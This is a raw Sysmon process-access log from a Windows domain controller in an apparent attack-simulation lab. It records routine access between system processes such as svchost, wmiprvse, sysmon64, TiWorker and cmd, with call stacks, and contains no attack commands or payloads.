08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.355{5D479F2C-16B6-5F84-5B00-000000007F01}36163860C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16B6-5F84-5B00-000000007F01}36163860C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-5C00-000000007F01}3676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 